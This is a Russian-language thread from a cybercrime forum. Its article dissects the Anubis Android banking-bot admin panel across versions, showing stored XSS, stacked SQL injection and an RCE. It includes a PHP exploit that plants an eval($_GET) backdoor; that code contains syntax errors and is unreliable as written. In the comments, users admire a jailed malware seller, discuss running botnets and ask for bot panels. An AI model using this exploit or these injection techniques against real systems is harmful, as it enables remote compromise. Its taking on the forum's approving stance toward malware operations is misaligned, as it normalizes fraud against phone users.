• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Изучаем Anubis

RedBear

RAID-массив
Пользователь
Регистрация
12.05.2019
Сообщения
71
Реакции
411
Для конкурса статей, решил сделать анализ панели Анубиса. Бот популярный, наделал много шума, найти админки разных версий не составляет труда.

Вместе с вами мы проследим, как со временем улучшалось качество и безопасность кода.

Android Bot by maza-in

Начнем с саааааамой старой версии. С той версии, когда непосредственно Анубиса еще не было, а был просто "Android Bot by maza-in". Тот самый бот из статьи, которая заняла первое место на конкурсе:
img_5dd93ce493de0.png

Говорят, дареному коню в зубы не смотрят, но мы всё же посмотрим.

XSS

Начнем с простенького. Файл kliets.php. Следим за руками (стрелочками):

img_5dd912ec16548.png

И вывод на страничку:
img_5dd9133abb894.png

Может данные как-то фильтруются, когда попадают в БД? Файлик set_data.php, где код добавления новых ботов:
img_5dd9171b7a11e.png

Это чудесно, что используется функция htmlspecialchars(), однако смысла в ней нет никакого - дальше идет расшифровка данных, и уже они попадают в SQL-запрос без какой-либо фильтрации.

Клепаем простенький сплойтик, отправляем пайлоад в админку, результат:
img_5dd917ffdf88d.png

SQL-injection

Как было упомянуто выше, имеются и sql-инъекции. Однако, мы не будем морочиться с тем, чтобы формировать какой-то хитрый запрос от бота, есть путь существенно проще.

Файл command_go_modul.php, доступен кому угодно:
img_5dd91a8631257.png

Учитывая, что это PDO, можно просто дописать еще SQL команды, после точки с запятой:
img_5dd91b32572f8.png

На скриншоте видно, как можно удалить всё из таблицы commands. Но не обязательно что-либо удалять - мы можем использовать любой другой SQL-запрос (INSERT, UPDATE, DROP, CREATE).

Anubis
А это уже не паблик бот. Приватный продукт, который все хотят купить, но никто не знает где достать. Давайте посмотрим, какие изменения коснулись кода панели.

XSS

Как и в старой версии, никакой фильтрации нет (всё тот же файл kliets.php):
img_5dd9349272dc5.png

И чуть ниже, как мы любим:
img_5dd934ba54cb8.png

Точно также - делаем "отстук" ботом с полезной нагрузкой и:
img_5dd92c33379ac.png

SQL Injection

Всё те же самые ошибки. Только файл теперь называется set_go_modul.php:
img_5dd93668b1a61.png

И далее:
img_5dd93725a0588.png

Совершенно также - дописываем код, ставим точку с запятой и выполняем любую SQL-команду.

Разумеется, бот по ру не работал, ни в коем случае:
img_5dd92d0694f4b.png

Наверное, супостаты х#й в жопу инжекты в папку подкинули.
Как-то странно, этот бот, образно выражаясь, уже не дареный, но зубы у него такие же гнилые как и у прошлого...

Anubis 2.5
Перескочим на последнюю версию. Должно быть здесь то уже всё схвачено. Но...

XSS
Структура панели поменялась, файлы переименованы, но все ошибки были заботливо сохранены (botstable.php):

img_5dd94212e8de5.png

И чуть ниже:
img_5dd9423c8a363.png

Если кто-то получит доступ к phpmyadmin или adminer, то от XSS не защититься. Но может быть были предприняты какие-то меры и есть какая-никакая фильтрация на входе?

Смотрим файлик a3.php:
img_5dd942d406022.png

И еще раз, чуть ниже:

img_5dd942f404cc9.png

ШТОШ. Ну не в этот раз. Опять отправляем через бота запрос и опять наблюдаем уже поднадоевший alert:
img_5dd9437ad1630.png


SQL injection

Если еще раз посмотреть на код файла a3.php, можно заметить, что PDO::prepare используется совершенно неправильно:


img_5dd944633caf1.png

Это как надо, а в коде просто переменные в кавычках. Выходит, как и в прошлых версиях, в этой мы тоже можем выполнить любой SQL-код. Стабильность - это то, что действительно нужно в нашем нелегком деле.

RCE

В новой версии, автор не мог нас не порадовать чем-то новеньким. Посмотрим на файл setURL.php:

img_5dd945700c001.png

Эксплоит не сильно сложный:
Код:
<?php
 
$seturl= "path_to_anubis/inj/setURL.php";
 
$url = parse_url($seturl);
$payload = md5($url['scheme']."://".$url['host'];).'|https://123{$kek[eval($_GET[lol])]}';
 
$opts = array('http' =>
    array(
    'method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded',
    'content' => http_build_query(array('p' => $payload));
    )
);
 
$context = stream_context_create($opts);
$result = file_get_contents($seturl, false, $context);
Как отработает, можем творить непотребства:
img_5dd9480b192b8.png

Заключение.

Да, потом с мазой случилось и заключение, но речь совершенно не об этом.
Как мы можем видеть, в коде панели шлейф из ошибок, еще с самой первой версии, конца 2016 года. Неважно, бесплатно раздается продукт или продается в тех самых "приватах" за нескромные суммы - от уязвимостей это не спасает.
Всё как всегда.
b2b7c451cbddc634ecc0dc37031fb4d6.jpg
 
Если объединить XSS в админке любого бота и технику вроде описанной здесь - https://krober.biz/?p=3282, у атакующего будет куда больше, чем просто логи с 2-3 полудохлых ботов. И под атакующим я подразумеваю вовсе не хакера с корыстным интересом, а товарищей вроде тех, что работают на уничтожителя таксистов, АВ, органы и т.д. (для примера - ютуб/watch?v=ODW4-hrSy-w).
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
И под атакующим я подразумеваю вовсе не хакера с корыстным интересом, а товарищей вроде тех, что работают на уничтожителя таксистов
1574533901600.png


Красиво а̶б̶а̶с̶р̶а̶л̶ разОбрал в духе Ацамаса
Для конкурса статей ??
какого нахуй ацамаса?При чем тут это вообще?
 
Красиво а̶б̶а̶с̶р̶а̶л̶ разОбрал в духе Ацамаса
Для конкурса статей ??

Ацамаз в отличии от 99% людей на мой взгляд, в свои 16 лет заработал больше чем все те остальные % на протяжении 16-25 лет, если не больше.
Да, был проеб, да повязали, но разве свои деньги он не заработал?

p.s. хоть в кодинге и не разбираюсь от слова совсем, но статья понравилась, заставляет задуматься о небезопасности использования панелек софта.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ацамаз в отличии от 99% людей на мой взгляд, в свои 16 лет заработал больше чем все те остальные % на протяжении 16-25 лет, если не больше.
Да, был проеб, да повязали, но разве свои деньги он не заработал?

p.s. хоть в кодинге и не разбираюсь от слова совсем, но статья понравилась, заставляет задуматься о небезопасности использования панелек софта.
кто такой ацамаз?
 
кто такой ацамаз?
ImSorry
1m5orry
1m50rry

Какой-то такой ник :D
Продавал мaйнер, стиллep, бoтнет
 
Зачем панель используй ТГ. стучат сейчас все в ботовТГ своих
Всё пиздец , расходимся господа...
А по теме, есть у кого норм панель? Или прямые руки) жду в лс
 
Зачем панель используй ТГ. стучат сейчас все в ботовТГ своих
Да, все APT юзают ТГ-ботов. Топ-техника настоящих профи.
И еще управлять то как удобно, особенно когда чуть больше 10 ботов.
 
Да, все APT юзают ТГ-ботов. Топ-техника настоящих профи.
И еще управлять то как удобно, особенно когда чуть больше 10 ботов.
чувствуется доля сарказма, а может быть и не доля :D но есть свои плюсы и там.
 
ру-ру = да ебал я всё в пизду!

Нарожают - майся с ними. Это всё когда было? сейчас рынок вполне себе и есть разгуляться и понажыриться есть и совесть не причём будет.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ацамаз в отличии от 99% людей на мой взгляд, в свои 16 лет заработал больше чем все те остальные % на протяжении 16-25 лет, если не больше.
Да, был проеб, да повязали, но разве свои деньги он не заработал?
16-25 лет?Мне кажется вы сильно переоцениваете сколько он заработал...
в любом случае это того не стоило - теперь он сосет х#й работая на фрилансе потому что на нормальную работу его уже никогда с такой репутацией не возьмут (типа майков или аверов,куда он метил),за пределы рф он тоже поехать никуда не может...Так себе ситуация если честно
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Кробер сайт твой? Купил чтоль? Текста годичные и нынишние очень сильно отличаються, как будто другой человек писал.
дааа, старые текста были классными, как буд-то медведъ под чем то :D сейчас видимо бросил дурь )
 
дааа, старые текста были классными, как буд-то медведъ под чем то :D сейчас видимо бросил дурь )
и помолодел лет на 10 :)))) Может быть яспутал, может не годичные а те что были 1-3 года назад. В прошлом году читал блог.
 
Кробер сайт твой? Купил чтоль? Текста годичные и нынишние очень сильно отличаються, как будто другой человек писал.
Что вероятнее - что кто-то по своей глупости выкупил наркоманский блог или что человек, который ведет блог, может варьировать стиль текстов, которые пишет? Или еще вариант. А что если блог всё это время вёл не один человек, а несколько?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх